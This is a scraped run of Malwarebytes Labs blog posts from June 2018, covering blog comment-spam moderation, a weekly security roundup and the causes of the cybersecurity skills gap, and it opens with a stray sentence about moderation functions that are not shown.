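`moderation_reasons` mirrors the per-comment hold criteria: it never rejects outright, it only decides whether a human needs to look, which is the trade-off the post describes. `bot_signals` needs the whole batch, because duplicate text and per-IP volume cannot be judged from one comment; in practice the batch would be a sliding window of recent submissions.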

What are the spammers after?

The main goal of these spammers is to get the attention of the readers, whether that’s by getting users to click on a link to their website or to send an email to their account(s). On rare occasions, links are posted to improve the SEO of the target page.

They will say anything to get their links posted.

How to fight comment spammers

By knowing what they are after, you can work out an effective strategy to fight off comment spammers (if you are dealing with them on your own site). An automated system will take a lot of work out of your hands. Disqus and Akismet are the most popular WordPress comment filters. Both will allow you to review blocked comments and make changes, if you want.

When your comments on our blog don’t go through

The above reasons hopefully explain why we chose a combination of safety measures to protect our users, including blocking all links. In our situation, it’s better to create a little extra work for human moderators than to run the risk of allowing malicious links on our site.

If you feel we blocked your comment in error or need help with any of our products, you may reach out to our support team or post on our forums. If you posted a comment and it’s taking a while to see it on our site, double check that you aren’t violating our comment policy/filters. If you are, feel free to post an amended comment instead—that will likely appear automatically and allow you to participate in active discussions.

The post Did my comment on your blog get lost? appeared first on Malwarebytes Labs.

A week in security (June 18 – June 24)

Malware Bytes Security - Mon, 06/25/2018 - 12:29pm

Last week, we took a deep dive into SamSam ransomware, looked at how to identify and delete malicious emails, recognized that there are now risks affecting job recruitment portals, analyzed a malicious Android app banking on the popularity of Fortnite, and identified causes and solutions for the skills shortage in cybersecurity.

Other news

Stay safe, everyone!

The post A week in security (June 18 – June 24) appeared first on Malwarebytes Labs.

What’s causing the cybersecurity skills gap?

Malware Bytes Security - Thu, 06/21/2018 - 11:00am

The proliferation of next-gen technology into mainstream society has been a boon for consumers, entrepreneurs, and business owners alike. Between the rise of mobile computing, the Internet of Things (IoT), and modern social media, our society is more connected than ever before.

But all of this technology presents some new problems, too. According to recent studies, the number of companies that report problematic shortages in the cybersecurity skills of their staff has increased steadily over the past several years. While approximately 23 percent of companies indicated such an issue in 2014, more than 50 percent face the same challenge today.

Additionally, recent reports show that, not surprisingly, 100 percent of tech companies view cybersecurity and privacy breaches as a risk, with 88 percent concerned about their ability to manage their IT infrastructure, and 78 percent worried about how they’ll comply with data privacy regulations.

So what’s the problem with cybersecurity? What’s causing such a lack of know-how on such an important cause? Let’s take a look.

Primary causes

Some of the primary causes of the cybersecurity skills gap include:

1. Failure to collaborate

Cybersecurity is a collaborative responsibility that the whole company needs to get behind. Not only does a CEO or CISO need to maintain a comprehensive and versatile IT staff to take a proactive stance against hackers and cybercriminals, but they also need to open two-way lines of communication to address any problems before they get out of hand.

IT staff and cybersecurity researchers also need to collaborate—with one another and with other professionals in the industry. Given the rapid evolutionary nature of the Internet and its related systems, it’s impossible for any one person—or even one team—to keep up with the day-to-day changes.

2. Lack of process standardization

Although cybersecurity isn’t a standardized job, the task of securing an online system from potential hackers can be automated. This isn’t to say that a company can get rid of its entire IT staff—in fact, it’s just the opposite. Not only are knowledgeable IT experts needed to usher in this standardization, but they’re needed to enforce it, too.

Cybersecurity standardization is achievable in multiple ways, including:

  • Penetration testing: This lets IT staff members run their proprietary hacks and exploits against a system to ensure it is secure from outside hackers and unknown threats.
  • Incident response: Standardizing an IT team’s incident response protocol makes sure everyone is on the same page and knows how to react if a breach does occur.

It’s a winning situation for everyone involved. Owners and CEOs gain comfort knowing that their investments are protected. IT teams get to use their tools and knowledge. And customers don’t have to worry about their personal information falling into the wrong hands.

3. Not enough training opportunities

There’s also a lack of training opportunities in the industry. Although this is an area that sees continual improvement, especially as more colleges and universities embrace areas of study such as big data, the IoT, and cybersecurity, academia still gets far outpaced by the desire, motivation, and sheer boredom that drive today’s hackers.

Potential solutions

Although it will take a concentrated effort to close the cybersecurity skills gap, society is progressing in the right direction. Companies explore and utilize several potential options, including:

1. Workforce investments

Some companies are increasing their investments in the human workforce to join the fight against cybercrime. According to recent studies, only 32 percent of organizations currently provide adequate training in IT security. The same study reveals that 86 percent of respondents do not spend enough capital on their internal training initiatives.

Other companies are hiring IT staff based on their potential instead of their actual past experience. This is a risky process, as working in cybersecurity requires technical acumen and the ability to adapt in the face of fast-paced changes, but some companies have had great success when hiring outside the box. Mathematicians, accountants, or even artists have been hired and deployed successfully to IT security or research teams. Such diverse expertise helps when examining problems from all possible angles.

Making investments to bring more women into the profession is another viable strategy. According to recent studies, female workers comprise only 11 percent of the entire industry workforce. Organizations such as Women in CyberSecurity and Women in International Security are both helping women gain a better foothold in an industry that is traditionally dominated by men.

2. The millennial generation

Millennials could be one of the best tools for fighting cybercrime. Not only are they already familiar with technology, but many of them are interested in entering and leading a tech-oriented career. According to recent surveys, 68 percent of respondents view themselves as technological innovators while 41 percent are early adopters of modern technology.

This spells good news for employers. Technological innovators are known for their outside-of-the-box thinking and proactive attitude toward next-gen technology. Some might come up with new utilities, tools, and methods to support the fight against cybercrime.

Early adopters are typically ahead of the curve when it comes to using new technology. They help by finding and popularizing new tools, and are often tech savvy enough to stave off potential scams and other social engineering tactics.

Unfortunately, the latest reports indicate that less than 10 percent of millennials are interested in making cybersecurity a long-term career. Other professionals predict that our current generation of IT experts is already starting to hit retirement age—a trend that will only make the skills gap worse within the next few years.

But the lack of millennial interest doesn’t stem from a lack of technical interest. Instead, millennials tend to embrace more “exciting” tech development careers, such as video game development, social media, engineering, and app development, to name a few. By repositioning cybersecurity as “cool,” recruiters and other hiring organizations might draw in a younger workforce ready to fight crime on the Internet.

3. Automating processes

Process automation is gaining a lot of steam in the cybersecurity niche. While not long ago data breaches and other incidents required a customized, manual resolution, the power of today’s machine-learning and AI-powered cybersecurity programs makes manual intervention almost obsolete.

But human staff members still need to deploy and/or program these systems and monitor the processes they use. Not only does this give IT staff a position on the front lines in the fight against cybercrime, but it also gives them the opportunity to learn new concepts and technologies before many of their peers.

Minimizing the gap in the future

Companies will reduce much of the skills gap if they divert more resources to building up cybersecurity research and IT teams, and plan ahead. This isn’t always easy—especially with the rapid and ever-changing nature of the development of IT in the 21st century. But there are some strong trends in place to help, starting with an overall increase in cybersecurity awareness over the latter part of the decade.

Roles such as security analyst and security manager are almost always in demand—and they show no signs of slowing. Filling these roles with skilled, knowledgeable experts might not solve every IT problem—but it’s a good start.

The post What’s causing the cybersecurity skills gap? appeared first on Malwarebytes Labs.